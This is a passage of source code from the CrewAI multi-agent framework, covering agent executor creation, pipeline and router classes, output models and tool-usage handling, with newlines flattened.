tool_result.get("result_as_answer", False): result = tool_result["result"] return result def format_log_to_str( self, intermediate_steps: List[Tuple[AgentAction, str]], observation_prefix: str = "Observation: ", llm_prefix: str = "", ) -> str: """Construct the scratchpad that lets the agent continue its thought process.""" thoughts = "" for action, observation in intermediate_steps: thoughts += action.log thoughts += f"\n{observation_prefix}{observation}\n{llm_prefix}" return thoughts def create_agent_executor(self, tools=None) -> None: """Create an agent executor for the agent. Returns: An instance of the CrewAgentExecutor class. """ tools = tools or self.tools or [] agent_args = { "input": lambda x: x["input"], "tools": lambda x: x["tools"], "tool_names": lambda x: x["tool_names"], "agent_scratchpad": lambda x: self.format_log_to_str( x["intermediate_steps"] ), } executor_args = { "llm": self.llm, "i18n": self.i18n, "crew": self.crew, "crew_agent": self, "tools": self._parse_tools(tools), "verbose": self.verbose, "original_tools": tools, "handle_parsing_errors": True, "max_iterations": self.max_iter, "max_execution_time": self.max_execution_time, "step_callback": self.step_callback, "tools_handler": self.tools_handler, "function_calling_llm": self.function_calling_llm, "callbacks": self.callbacks, "max_tokens": self.max_tokens, } if self._rpm_controller: executor_args["request_within_rpm_limit"] = ( self._rpm_controller.check_or_wait ) prompt = Prompts( i18n=self.i18n, tools=tools, system_template=self.system_template, prompt_template=self.prompt_template, response_template=self.response_template, ).task_execution() execution_prompt = prompt.partial( goal=self.goal, role=self.role, backstory=self.backstory, ) stop_words = [self.i18n.slice("observation")] if self.response_template: stop_words.append( self.response_template.split("{{ .Response }}")[1].strip() ) bind = self.llm.bind(stop=stop_words) inner_agent = agent_args | execution_prompt | bind | CrewAgentParser(agent=self) self.agent_executor = CrewAgentExecutor( agent=RunnableAgent(runnable=inner_agent), **executor_args ) def get_delegation_tools(self, agents: List[BaseAgent]): agent_tools = AgentTools(agents=agents) tools = agent_tools.tools() return tools def get_code_execution_tools(self): try: from crewai_tools import CodeInterpreterTool return [CodeInterpreterTool()] except ModuleNotFoundError: self._logger.log( "info", "Coding tools not available. Install crewai_tools. " ) def get_output_converter(self, llm, text, model, instructions): return Converter(llm=llm, text=text, model=model, instructions=instructions) def _parse_tools(self, tools: List[Any]) -> List[LangChainTool]: # type: ignore # Function "langchain_core.tools.tool" is not valid as a type """Parse tools to be used for the task.""" tools_list = [] try: # tentatively try to import from crewai_tools import BaseTool as CrewAITool from crewai_tools import BaseTool as CrewAITool for tool in tools: if isinstance(tool, CrewAITool): tools_list.append(tool.to_langchain()) else: tools_list.append(tool) except ModuleNotFoundError: tools_list = [] for tool in tools: tools_list.append(tool) return tools_list def _training_handler(self, task_prompt: str) -> str: """Handle training data for the agent task prompt to improve output on Training.""" if data := CrewTrainingHandler(TRAINING_DATA_FILE).load(): agent_id = str(self.id) if data.get(agent_id): human_feedbacks = [ i["human_feedback"] for i in data.get(agent_id, {}).values() ] task_prompt += "You MUST follow these feedbacks: \n " + "\n - ".join( human_feedbacks ) return task_prompt def _use_trained_data(self, task_prompt: str) -> str: """Use trained data for the agent task prompt to improve output.""" if data := CrewTrainingHandler(TRAINED_AGENTS_DATA_FILE).load(): if trained_data_output := data.get(self.role): task_prompt += "You MUST follow these feedbacks: \n " + "\n - ".join( trained_data_output["suggestions"] ) return task_prompt def _render_text_description(self, tools: List[BaseTool]) -> str: """Render the tool name and description in plain text. Output will be in the format of: .. code-block:: markdown search: This tool is used for search calculator: This tool is used for math """ description = "\n".join( [ f"Tool name: {tool.name}\nTool description:\n{tool.description}" for tool in tools ] ) return description def _render_text_description_and_args(self, tools: List[BaseTool]) -> str: """Render the tool name, description, and args in plain text. Output will be in the format of: .. code-block:: markdown search: This tool is used for search, args: {"query": {"type": "string"}} calculator: This tool is used for math, \ args: {"expression": {"type": "string"}} """ tool_strings = [] for tool in tools: args_schema = str(tool.args) if hasattr(tool, "func") and tool.func: sig = signature(tool.func) description = ( f"Tool Name: {tool.name}{sig}\nTool Description: {tool.description}" ) else: description = ( f"Tool Name: {tool.name}\nTool Description: {tool.description}" ) tool_strings.append(f"{description}\nTool Arguments: {args_schema}") return "\n".join(tool_strings) @staticmethod def __tools_names(tools) -> str: return ", ".join([t.name for t in tools]) def __repr__(self): return f"Agent(role={self.role}, goal={self.goal}, backstory={self.backstory})" File: src/crewai/process.py from enum import Enum class Process(str, Enum): """ Class representing the different processes that can be used to tackle tasks """ sequential = "sequential" hierarchical = "hierarchical" # TODO: consensual = 'consensual' File: src/crewai/routers/__init__.py from crewai.routers.router import Router __all__ = ["Router"] File: src/crewai/routers/router.py from copy import deepcopy from typing import Any, Callable, Dict, Tuple from pydantic import BaseModel, Field, PrivateAttr class Route(BaseModel): condition: Callable[[Dict[str, Any]], bool] pipeline: Any class Router(BaseModel): routes: Dict[str, Route] = Field( default_factory=dict, description="Dictionary of route names to (condition, pipeline) tuples", ) default: Any = Field(..., description="Default pipeline if no conditions are met") _route_types: Dict[str, type] = PrivateAttr(default_factory=dict) class Config: arbitrary_types_allowed = True def __init__(self, routes: Dict[str, Route], default: Any, **data): super().__init__(routes=routes, default=default, **data) self._check_copyable(default) for name, route in routes.items(): self._check_copyable(route.pipeline) self._route_types[name] = type(route.pipeline) @staticmethod def _check_copyable(obj: Any) -> None: if not hasattr(obj, "copy") or not callable(getattr(obj, "copy")): raise ValueError(f"Object of type {type(obj)} must have a 'copy' method") def add_route( self, name: str, condition: Callable[[Dict[str, Any]], bool], pipeline: Any, ) -> "Router": """ Add a named route with its condition and corresponding pipeline to the router. Args: name: A unique name for this route condition: A function that takes a dictionary input and returns a boolean pipeline: The Pipeline to execute if the condition is met Returns: The Router instance for method chaining """ self._check_copyable(pipeline) self.routes[name] = Route(condition=condition, pipeline=pipeline) self._route_types[name] = type(pipeline) return self def route(self, input_data: Dict[str, Any]) -> Tuple[Any, str]: """ Evaluate the input against the conditions and return the appropriate pipeline. Args: input_data: The input dictionary to be evaluated Returns: A tuple containing the next Pipeline to be executed and the name of the route taken """ for name, route in self.routes.items(): if route.condition(input_data): return route.pipeline, name return self.default, "default" def copy(self) -> "Router": """Create a deep copy of the Router.""" new_routes = { name: Route( condition=deepcopy(route.condition), pipeline=route.pipeline.copy(), ) for name, route in self.routes.items() } new_default = self.default.copy() return Router(routes=new_routes, default=new_default) File: src/crewai/pipeline/pipeline_output.py import uuid from typing import List from pydantic import UUID4, BaseModel, Field from crewai.pipeline.pipeline_kickoff_result import PipelineKickoffResult class PipelineOutput(BaseModel): id: UUID4 = Field( default_factory=uuid.uuid4, frozen=True, description="Unique identifier for the object, not set by user.", ) run_results: List[PipelineKickoffResult] = Field( description="List of results for each run through the pipeline", default=[] ) def add_run_result(self, result: PipelineKickoffResult): self.run_results.append(result) File: src/crewai/pipeline/__init__.py from crewai.pipeline.pipeline import Pipeline from crewai.pipeline.pipeline_kickoff_result import PipelineKickoffResult from crewai.pipeline.pipeline_output import PipelineOutput __all__ = ["Pipeline", "PipelineKickoffResult", "PipelineOutput"] File: src/crewai/pipeline/pipeline.py import asyncio import copy from typing import Any, Dict, List, Tuple, Union from pydantic import BaseModel, Field, model_validator from crewai.crew import Crew from crewai.crews.crew_output import CrewOutput from crewai.pipeline.pipeline_kickoff_result import PipelineKickoffResult from crewai.routers.router import Router from crewai.types.usage_metrics import UsageMetrics Trace = Union[Union[str, Dict[str, Any]], List[Union[str, Dict[str, Any]]]] PipelineStage = Union[Crew, List[Crew], Router] """ Developer Notes: This module defines a Pipeline class that represents a sequence of operations (stages) to process inputs. Each stage can be either sequential or parallel, and the pipeline can process multiple kickoffs concurrently. Core Loop Explanation: 1. The `process_kickoffs` method processes multiple kickoffs in parallel, each going through all pipeline stages. 2. The `process_single_kickoff` method handles the processing of a single kickouff through all stages, updating metrics and input data along the way. 3. The `_process_stage` method determines whether a stage is sequential or parallel and processes it accordingly. 4. The `_process_single_crew` and `_process_parallel_crews` methods handle the execution of single and parallel crew stages. 5. The `_update_metrics_and_input` method updates usage metrics and the current input with the outputs from a stage. 6. The `_build_pipeline_kickoff_results` method constructs the final results of the pipeline kickoff, including traces and outputs. Handling Traces and Crew Outputs: - During the processing of stages, we handle the results (traces and crew outputs) for all stages except the last one differently from the final stage. - For intermediate stages, the primary focus is on passing the input data between stages. This involves merging the output dictionaries from all crews in a stage into a single dictionary and passing it to the next stage. This merged dictionary allows for smooth data flow between stages. - For the final stage, in addition to passing the input data, we also need to prepare the final outputs and traces to be returned as the overall result of the pipeline kickoff. In this case, we do not merge the results, as each result needs to be included separately in its own pipeline kickoff result. Pipeline Terminology: - Pipeline: The overall structure that defines a sequence of operations. - Stage: A distinct part of the pipeline, which can be either sequential or parallel. - Kickoff: A specific execution of the pipeline for a given set of inputs, representing a single instance of processing through the pipeline. - Branch: Parallel executions within a stage (e.g., concurrent crew operations). - Trace: The journey of an individual input through the entire pipeline. Example pipeline structure: crew1 >> crew2 >> crew3 This represents a pipeline with three sequential stages: 1. crew1 is the first stage, which processes the input and passes its output to crew2. 2. crew2 is the second stage, which takes the output from crew1 as its input, processes it, and passes its output to crew3. 3. crew3 is the final stage, which takes the output from crew2 as its input and produces the final output of the pipeline. Each input creates its own kickoff, flowing through all stages of the pipeline. Multiple kickoffss can be processed concurrently, each following the defined pipeline structure. Another example pipeline structure: crew1 >> [crew2, crew3] >> crew4 This represents a pipeline with three stages: 1. A sequential stage (crew1) 2. A parallel stage with two branches (crew2 and crew3 executing concurrently) 3. Another sequential stage (crew4) Each input creates its own kickoff, flowing through all stages of the pipeline. Multiple kickoffs can be processed concurrently, each following the defined pipeline structure. """ class Pipeline(BaseModel): stages: List[PipelineStage] = Field( ..., description="List of crews representing stages to be executed in sequence" ) @model_validator(mode="before") @classmethod def validate_stages(cls, values): stages = values.get("stages", []) def check_nesting_and_type(item, depth=0): if depth > 1: raise ValueError("Double nesting is not allowed in pipeline stages") if isinstance(item, list): for sub_item in item: check_nesting_and_type(sub_item, depth + 1) elif not isinstance(item, (Crew, Router)): raise ValueError( f"Expected Crew instance, Router instance, or list of Crews, got {type(item)}" ) for stage in stages: check_nesting_and_type(stage) return values async def kickoff( self, inputs: List[Dict[str, Any]] ) -> List[PipelineKickoffResult]: """ Processes multiple runs in parallel, each going through all pipeline stages. Args: inputs (List[Dict[str, Any]]): List of inputs for each run. Returns: List[PipelineKickoffResult]: List of results from each run. """ pipeline_results: List[PipelineKickoffResult] = [] # Process all runs in parallel all_run_results = await asyncio.gather( *(self.process_single_kickoff(input_data) for input_data in inputs) ) # Flatten the list of lists into a single list of results pipeline_results.extend( result for run_result in all_run_results for result in run_result ) return pipeline_results async def process_single_kickoff( self, kickoff_input: Dict[str, Any] ) -> List[PipelineKickoffResult]: """ Processes a single run through all pipeline stages. Args: input (Dict[str, Any]): The input for the run. Returns: List[PipelineKickoffResult]: The results of processing the run. """ initial_input = copy.deepcopy(kickoff_input) current_input = copy.deepcopy(kickoff_input) stages = self._copy_stages() pipeline_usage_metrics: Dict[str, UsageMetrics] = {} all_stage_outputs: List[List[CrewOutput]] = [] traces: List[List[Union[str, Dict[str, Any]]]] = [[initial_input]] stage_index = 0 while stage_index < len(stages): stage = stages[stage_index] stage_input = copy.deepcopy(current_input) if isinstance(stage, Router): next_pipeline, route_taken = stage.route(stage_input) stages = ( stages[: stage_index + 1] + list(next_pipeline.stages) + stages[stage_index + 1 :] ) traces.append([{"route_taken": route_taken}]) stage_index += 1 continue stage_outputs, stage_trace = await self._process_stage(stage, stage_input) self._update_metrics_and_input( pipeline_usage_metrics, current_input, stage, stage_outputs ) traces.append(stage_trace) all_stage_outputs.append(stage_outputs) stage_index += 1 return self._build_pipeline_kickoff_results( all_stage_outputs, traces, pipeline_usage_metrics ) async def _process_stage( self, stage: PipelineStage, current_input: Dict[str, Any] ) -> Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: """ Processes a single stage of the pipeline, which can be either sequential or parallel. Args: stage (Union[Crew, List[Crew]]): The stage to process. current_input (Dict[str, Any]): The input for the stage. Returns: Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: The outputs and trace of the stage. """ if isinstance(stage, Crew): return await self._process_single_crew(stage, current_input) elif isinstance(stage, list) and all(isinstance(crew, Crew) for crew in stage): return await self._process_parallel_crews(stage, current_input) else: raise ValueError(f"Unsupported stage type: {type(stage)}") async def _process_single_crew( self, crew: Crew, current_input: Dict[str, Any] ) -> Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: """ Processes a single crew. Args: crew (Crew): The crew to process. current_input (Dict[str, Any]): The input for the crew. Returns: Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: The output and trace of the crew. """ output = await crew.kickoff_async(inputs=current_input) return [output], [crew.name or str(crew.id)] async def _process_parallel_crews( self, crews: List[Crew], current_input: Dict[str, Any] ) -> Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: """ Processes multiple crews in parallel. Args: crews (List[Crew]): The list of crews to process in parallel. current_input (Dict[str, Any]): The input for the crews. Returns: Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: The outputs and traces of the crews. """ parallel_outputs = await asyncio.gather( *[crew.kickoff_async(inputs=current_input) for crew in crews] ) return parallel_outputs, [crew.name or str(crew.id) for crew in crews] def _update_metrics_and_input( self, usage_metrics: Dict[str, UsageMetrics], current_input: Dict[str, Any], stage: PipelineStage, outputs: List[CrewOutput], ) -> None: """ Updates metrics and current input with the outputs of a stage. Args: usage_metrics (Dict[str, Any]): The usage metrics to update. current_input (Dict[str, Any]): The current input to update. stage (Union[Crew, List[Crew]]): The stage that was processed. outputs (List[CrewOutput]): The outputs of the stage. """ if isinstance(stage, Crew): usage_metrics[stage.name or str(stage.id)] = outputs[0].token_usage current_input.update(outputs[0].to_dict()) elif isinstance(stage, list) and all(isinstance(crew, Crew) for crew in stage): for crew, output in zip(stage, outputs): usage_metrics[crew.name or str(crew.id)] = output.token_usage current_input.update(output.to_dict()) else: raise ValueError(f"Unsupported stage type: {type(stage)}") def _build_pipeline_kickoff_results( self, all_stage_outputs: List[List[CrewOutput]], traces: List[List[Union[str, Dict[str, Any]]]], token_usage: Dict[str, UsageMetrics], ) -> List[PipelineKickoffResult]: """ Builds the results of a pipeline run. Args: all_stage_outputs (List[List[CrewOutput]]): All stage outputs. traces (List[List[Union[str, Dict[str, Any]]]]): All traces. token_usage (Dict[str, Any]): Token usage metrics. Returns: List[PipelineKickoffResult]: The results of the pipeline run. """ formatted_traces = self._format_traces(traces) formatted_crew_outputs = self._format_crew_outputs(all_stage_outputs) return [ PipelineKickoffResult( token_usage=token_usage, trace=formatted_trace, raw=crews_outputs[-1].raw, pydantic=crews_outputs[-1].pydantic, json_dict=crews_outputs[-1].json_dict, crews_outputs=crews_outputs, ) for crews_outputs, formatted_trace in zip( formatted_crew_outputs, formatted_traces ) ] def _format_traces( self, traces: List[List[Union[str, Dict[str, Any]]]] ) -> List[List[Trace]]: """ Formats the traces of a pipeline run. Args: traces (List[List[Union[str, Dict[str, Any]]]]): The traces to format. Returns: List[List[Trace]]: The formatted traces. """ formatted_traces: List[Trace] = self._format_single_trace(traces[:-1]) return self._format_multiple_traces(formatted_traces, traces[-1]) def _format_single_trace( self, traces: List[List[Union[str, Dict[str, Any]]]] ) -> List[Trace]: """ Formats single traces. Args: traces (List[List[Union[str, Dict[str, Any]]]]): The traces to format. Returns: List[Trace]: The formatted single traces. """ formatted_traces: List[Trace] = [] for trace in traces: formatted_traces.append(trace[0] if len(trace) == 1 else trace) return formatted_traces def _format_multiple_traces( self, formatted_traces: List[Trace], final_trace: List[Union[str, Dict[str, Any]]], ) -> List[List[Trace]]: """ Formats multiple traces. Args: formatted_traces (List[Trace]): The formatted single traces. final_trace (List[Union[str, Dict[str, Any]]]): The final trace to format. Returns: List[List[Trace]]: The formatted multiple traces. """ traces_to_return: List[List[Trace]] = [] if len(final_trace) == 1: formatted_traces.append(final_trace[0]) traces_to_return.append(formatted_traces) else: for trace in final_trace: copied_traces = formatted_traces.copy() copied_traces.append(trace) traces_to_return.append(copied_traces) return traces_to_return def _format_crew_outputs( self, all_stage_outputs: List[List[CrewOutput]] ) -> List[List[CrewOutput]]: """ Formats the outputs of all stages into a list of crew outputs. Args: all_stage_outputs (List[List[CrewOutput]]): All stage outputs. Returns: List[List[CrewOutput]]: Formatted crew outputs. """ crew_outputs: List[CrewOutput] = [ output for stage_outputs in all_stage_outputs[:-1] for output in stage_outputs ] return [crew_outputs + [output] for output in all_stage_outputs[-1]] def _copy_stages(self): """Create a deep copy of the Pipeline's stages.""" new_stages = [] for stage in self.stages: if isinstance(stage, list): new_stages.append( [ crew.copy() if hasattr(crew, "copy") else copy.deepcopy(crew) for crew in stage ] ) elif hasattr(stage, "copy"): new_stages.append(stage.copy()) else: new_stages.append(copy.deepcopy(stage)) return new_stages def __rshift__(self, other: PipelineStage) -> "Pipeline": """ Implements the >> operator to add another Stage (Crew or List[Crew]) to an existing Pipeline. Args: other (Any): The stage to add. Returns: Pipeline: A new pipeline with the added stage. """ if isinstance(other, (Crew, Router)) or ( isinstance(other, list) and all(isinstance(item, Crew) for item in other) ): return type(self)(stages=self.stages + [other]) else: raise TypeError( f"Unsupported operand type for >>: '{type(self).__name__}' and '{type(other).__name__}'" ) File: src/crewai/pipeline/pipeline_kickoff_result.py import json import uuid from typing import Any, Dict, List, Optional, Union from pydantic import UUID4, BaseModel, Field from crewai.crews.crew_output import CrewOutput from crewai.types.usage_metrics import UsageMetrics class PipelineKickoffResult(BaseModel): """Class that represents the result of a pipeline run.""" id: UUID4 = Field( default_factory=uuid.uuid4, frozen=True, description="Unique identifier for the object, not set by user.", ) raw: str = Field(description="Raw output of the pipeline run", default="") pydantic: Any = Field( description="Pydantic output of the pipeline run", default=None ) json_dict: Union[Dict[str, Any], None] = Field( description="JSON dict output of the pipeline run", default={} ) token_usage: Dict[str, UsageMetrics] = Field( description="Token usage for each crew in the run" ) trace: List[Any] = Field( description="Trace of the journey of inputs through the run" ) crews_outputs: List[CrewOutput] = Field( description="Output from each crew in the run", default=[], ) @property def json(self) -> Optional[str]: if self.crews_outputs[-1].tasks_output[-1].output_format != "json": raise ValueError( "No JSON output found in the final task of the final crew. Please make sure to set the output_json property in the final task in your crew." ) return json.dumps(self.json_dict) def to_dict(self) -> Dict[str, Any]: """Convert json_output and pydantic_output to a dictionary.""" output_dict = {} if self.json_dict: output_dict.update(self.json_dict) elif self.pydantic: output_dict.update(self.pydantic.model_dump()) return output_dict def __str__(self): if self.pydantic: return str(self.pydantic) if self.json_dict: return str(self.json_dict) return self.raw File: src/crewai/crews/__init__.py from .crew_output import CrewOutput __all__ = ["CrewOutput"] File: src/crewai/crews/crew_output.py import json from typing import Any, Dict, Optional from pydantic import BaseModel, Field from crewai.tasks.output_format import OutputFormat from crewai.tasks.task_output import TaskOutput from crewai.types.usage_metrics import UsageMetrics class CrewOutput(BaseModel): """Class that represents the result of a crew.""" raw: str = Field(description="Raw output of crew", default="") pydantic: Optional[BaseModel] = Field( description="Pydantic output of Crew", default=None ) json_dict: Optional[Dict[str, Any]] = Field( description="JSON dict output of Crew", default=None ) tasks_output: list[TaskOutput] = Field( description="Output of each task", default=[] ) token_usage: UsageMetrics = Field(description="Processed token summary", default={}) @property def json(self) -> Optional[str]: if self.tasks_output[-1].output_format != OutputFormat.JSON: raise ValueError( "No JSON output found in the final task. Please make sure to set the output_json property in the final task in your crew." ) return json.dumps(self.json_dict) def to_dict(self) -> Dict[str, Any]: """Convert json_output and pydantic_output to a dictionary.""" output_dict = {} if self.json_dict: output_dict.update(self.json_dict) elif self.pydantic: output_dict.update(self.pydantic.model_dump()) return output_dict def __str__(self): if self.pydantic: return str(self.pydantic) if self.json_dict: return str(self.json_dict) return self.raw File: src/crewai/tasks/__init__.py from crewai.tasks.output_format import OutputFormat from crewai.tasks.task_output import TaskOutput __all__ = ["OutputFormat", "TaskOutput"] File: src/crewai/tasks/conditional_task.py from typing import Any, Callable from pydantic import Field from crewai.task import Task from crewai.tasks.output_format import OutputFormat from crewai.tasks.task_output import TaskOutput class ConditionalTask(Task): """ A task that can be conditionally executed based on the output of another task. Note: This cannot be the only task you have in your crew and cannot be the first since its needs context from the previous task. """ condition: Callable[[TaskOutput], bool] = Field( default=None, description="Maximum number of retries for an agent to execute a task when an error occurs.", ) def __init__( self, condition: Callable[[Any], bool], **kwargs, ): super().__init__(**kwargs) self.condition = condition def should_execute(self, context: TaskOutput) -> bool: """ Determines whether the conditional task should be executed based on the provided context. Args: context (Any): The context or output from the previous task that will be evaluated by the condition. Returns: bool: True if the task should be executed, False otherwise. """ return self.condition(context) def get_skipped_task_output(self): return TaskOutput( description=self.description, raw="", agent=self.agent.role if self.agent else "", output_format=OutputFormat.RAW, ) File: src/crewai/tasks/output_format.py from enum import Enum class OutputFormat(str, Enum): """Enum that represents the output format of a task.""" JSON = "json" PYDANTIC = "pydantic" RAW = "raw" File: src/crewai/tasks/task_output.py import json from typing import Any, Dict, Optional from pydantic import BaseModel, Field, model_validator from crewai.tasks.output_format import OutputFormat class TaskOutput(BaseModel): """Class that represents the result of a task.""" description: str = Field(description="Description of the task") name: Optional[str] = Field(description="Name of the task", default=None) expected_output: Optional[str] = Field( description="Expected output of the task", default=None ) summary: Optional[str] = Field(description="Summary of the task", default=None) raw: str = Field(description="Raw output of the task", default="") pydantic: Optional[BaseModel] = Field( description="Pydantic output of task", default=None ) json_dict: Optional[Dict[str, Any]] = Field( description="JSON dictionary of task", default=None ) agent: str = Field(description="Agent that executed the task") output_format: OutputFormat = Field( description="Output format of the task", default=OutputFormat.RAW ) @model_validator(mode="after") def set_summary(self): """Set the summary field based on the description.""" excerpt = " ".join(self.description.split(" ")[:10]) self.summary = f"{excerpt}..." return self @property def json(self) -> Optional[str]: if self.output_format != OutputFormat.JSON: raise ValueError( """ Invalid output format requested. If you would like to access the JSON output, please make sure to set the output_json property for the task """ ) return json.dumps(self.json_dict) def to_dict(self) -> Dict[str, Any]: """Convert json_output and pydantic_output to a dictionary.""" output_dict = {} if self.json_dict: output_dict.update(self.json_dict) elif self.pydantic: output_dict.update(self.pydantic.model_dump()) return output_dict def __str__(self) -> str: if self.pydantic: return str(self.pydantic) if self.json_dict: return str(self.json_dict) return self.raw File: src/crewai/tools/cache_tools.py from langchain.tools import StructuredTool from pydantic import BaseModel, Field from crewai.agents.cache import CacheHandler class CacheTools(BaseModel): """Default tools to hit the cache.""" name: str = "Hit Cache" cache_handler: CacheHandler = Field( description="Cache Handler for the crew", default_factory=CacheHandler, ) def tool(self): return StructuredTool.from_function( func=self.hit_cache, name=self.name, description="Reads directly from the cache", ) def hit_cache(self, key): split = key.split("tool:") tool = split[1].split("|input:")[0].strip() tool_input = split[1].split("|input:")[1].strip() return self.cache_handler.read(tool, tool_input) File: src/crewai/tools/__init__.py File: src/crewai/tools/tool_output_parser.py import json from typing import Any, List import regex from langchain.output_parsers import PydanticOutputParser from langchain_core.exceptions import OutputParserException from langchain_core.outputs import Generation from pydantic import ValidationError class ToolOutputParser(PydanticOutputParser): """Parses the function calling of a tool usage and it's arguments.""" def parse_result(self, result: List[Generation], *, partial: bool = False) -> Any: result[0].text = self._transform_in_valid_json(result[0].text) json_object = super().parse_result(result) try: return self.pydantic_object.parse_obj(json_object) except ValidationError as e: name = self.pydantic_object.__name__ msg = f"Failed to parse {name} from completion {json_object}. Got: {e}" raise OutputParserException(msg, llm_output=json_object) def _transform_in_valid_json(self, text) -> str: text = text.replace("```", "").replace("json", "") json_pattern = r"\{(?:[^{}]|(?R))*\}" matches = regex.finditer(json_pattern, text) for match in matches: try: # Attempt to parse the matched string as JSON json_obj = json.loads(match.group()) # Return the first successfully parsed JSON object json_obj = json.dumps(json_obj) return str(json_obj) except json.JSONDecodeError: # If parsing fails, skip to the next match continue return text File: src/crewai/tools/tool_usage.py import ast import os from difflib import SequenceMatcher from textwrap import dedent from typing import Any, List, Union from langchain_core.tools import BaseTool from langchain_openai import ChatOpenAI from crewai.agents.tools_handler import ToolsHandler from crewai.task import Task from crewai.telemetry import Telemetry from crewai.tools.tool_calling import InstructorToolCalling, ToolCalling from crewai.utilities import I18N, Converter, ConverterError, Printer agentops = None if os.environ.get("AGENTOPS_API_KEY"): try: import agentops # type: ignore except ImportError: pass OPENAI_BIGGER_MODELS = ["gpt-4o"] class ToolUsageErrorException(Exception): """Exception raised for errors in the tool usage.""" def __init__(self, message: str) -> None: self.message = message super().__init__(self.message) class ToolUsage: """ Class that represents the usage of a tool by an agent. Attributes: task: Task being executed. tools_handler: Tools handler that will manage the tool usage. tools: List of tools available for the agent. original_tools: Original tools available for the agent before being converted to BaseTool. tools_description: Description of the tools available for the agent. tools_names: Names of the tools available for the agent. function_calling_llm: Language model to be used for the tool usage. """ def __init__( self, tools_handler: ToolsHandler, tools: List[BaseTool], original_tools: List[Any], tools_description: str, tools_names: str, task: Task, function_calling_llm: Any, agent: Any, action: Any, ) -> None: self._i18n: I18N = I18N() self._printer: Printer = Printer() self._telemetry: Telemetry = Telemetry() self._run_attempts: int = 1 self._max_parsing_attempts: int = 3 self._remember_format_after_usages: int = 3 self.agent = agent self.tools_description = tools_description self.tools_names = tools_names self.tools_handler = tools_handler self.original_tools = original_tools self.tools = tools self.task = task self.action = action self.function_calling_llm = function_calling_llm # Handling bug (see https://github.com/langchain-ai/langchain/pull/16395): raise an error if tools_names have space for ChatOpenAI if isinstance(self.function_calling_llm, ChatOpenAI): if " " in self.tools_names: raise Exception( "Tools names should not have spaces for ChatOpenAI models." ) # Set the maximum parsing attempts for bigger models if (isinstance(self.function_calling_llm, ChatOpenAI)) and ( self.function_calling_llm.openai_api_base is None ): if self.function_calling_llm.model_name in OPENAI_BIGGER_MODELS: self._max_parsing_attempts = 2 self._remember_format_after_usages = 4 def parse(self, tool_string: str): """Parse the tool string and return the tool calling.""" return self._tool_calling(tool_string) def use( self, calling: Union[ToolCalling, InstructorToolCalling], tool_string: str ) -> str: if isinstance(calling, ToolUsageErrorException): error = calling.message if self.agent.verbose: self._printer.print(content=f"\n\n{error}\n", color="red") self.task.increment_tools_errors() return error # BUG? The code below seems to be unreachable try: tool = self._select_tool(calling.tool_name) except Exception as e: error = getattr(e, "message", str(e)) self.task.increment_tools_errors() if self.agent.verbose: self._printer.print(content=f"\n\n{error}\n", color="red") return error return f"{self._use(tool_string=tool_string, tool=tool, calling=calling)}" # type: ignore # BUG?: "_use" of "ToolUsage" does not return a value (it only ever returns None) def _use( self, tool_string: str, tool: BaseTool, calling: Union[ToolCalling, InstructorToolCalling], ) -> str: # TODO: Fix this return type tool_event = agentops.ToolEvent(name=calling.tool_name) if agentops else None # type: ignore if self._check_tool_repeated_usage(calling=calling): # type: ignore # _check_tool_repeated_usage of "ToolUsage" does not return a value (it only ever returns None) try: result = self._i18n.errors("task_repeated_usage").format( tool_names=self.tools_names ) if self.agent.verbose: self._printer.print(content=f"\n\n{result}\n", color="purple") self._telemetry.tool_repeated_usage( llm=self.function_calling_llm, tool_name=tool.name, attempts=self._run_attempts, ) result = self._format_result(result=result) # type: ignore # "_format_result" of "ToolUsage" does not return a value (it only ever returns None) return result # type: ignore # Fix the return type of this function except Exception: self.task.increment_tools_errors() result = None # type: ignore # Incompatible types in assignment (expression has type "None", variable has type "str") if self.tools_handler.cache: result = self.tools_handler.cache.read( # type: ignore # Incompatible types in assignment (expression has type "str | None", variable has type "str") tool=calling.tool_name, input=calling.arguments ) original_tool = next( (ot for ot in self.original_tools if ot.name == tool.name), None ) if result is None: #! finecwg: if not result --> if result is None try: if calling.tool_name in [ "Delegate work to coworker", "Ask question to coworker", ]: coworker = ( calling.arguments.get("coworker") if calling.arguments else None ) self.task.increment_delegations(coworker) if calling.arguments: try: acceptable_args = tool.args_schema.schema()["properties"].keys() # type: ignore # Item "None" of "type[BaseModel] | None" has no attribute "schema" arguments = { k: v for k, v in calling.arguments.items() if k in acceptable_args } result = tool.invoke(input=arguments) except Exception: arguments = calling.arguments result = tool.invoke(input=arguments) else: result = tool.invoke(input={}) except Exception as e: self._run_attempts += 1 if self._run_attempts > self._max_parsing_attempts: self._telemetry.tool_usage_error(llm=self.function_calling_llm) error_message = self._i18n.errors("tool_usage_exception").format( error=e, tool=tool.name, tool_inputs=tool.description ) error = ToolUsageErrorException( f'\n{error_message}.\nMoving on then. {self._i18n.slice("format").format(tool_names=self.tools_names)}' ).message self.task.increment_tools_errors() if self.agent.verbose: self._printer.print( content=f"\n\n{error_message}\n", color="red" ) return error # type: ignore # No return value expected self.task.increment_tools_errors() if agentops: agentops.record( agentops.ErrorEvent(exception=e, trigger_event=tool_event) ) return self.use(calling=calling, tool_string=tool_string) # type: ignore # No return value expected if self.tools_handler: should_cache = True if ( hasattr(original_tool, "cache_function") and original_tool.cache_function # type: ignore # Item "None" of "Any | None" has no attribute "cache_function" ): should_cache = original_tool.cache_function( # type: ignore # Item "None" of "Any | None" has no attribute "cache_function" calling.arguments, result ) self.tools_handler.on_tool_use( calling=calling, output=result, should_cache=should_cache ) if self.agent.verbose: self._printer.print(content=f"\n\n{result}\n", color="purple") if agentops: agentops.record(tool_event) self._telemetry.tool_usage( llm=self.function_calling_llm, tool_name=tool.name, attempts=self._run_attempts, ) result = self._format_result(result=result) # type: ignore # "_format_result" of "ToolUsage" does not return a value (it only ever returns None) data = { "result": result, "tool_name": tool.name, "tool_args": calling.arguments, } if ( hasattr(original_tool, "result_as_answer") and original_tool.result_as_answer # type: ignore # Item "None" of "Any | None" has no attribute "cache_function" ): result_as_answer = original_tool.result_as_answer # type: ignore # Item "None" of "Any | None" has no attribute "result_as_answer" data["result_as_answer"] = result_as_answer self.agent.tools_results.append(data) return result # type: ignore # No return value expected def _format_result(self, result: Any) -> None: self.task.used_tools += 1 if self._should_remember_format(): # type: ignore # "_should_remember_format" of "ToolUsage" does not 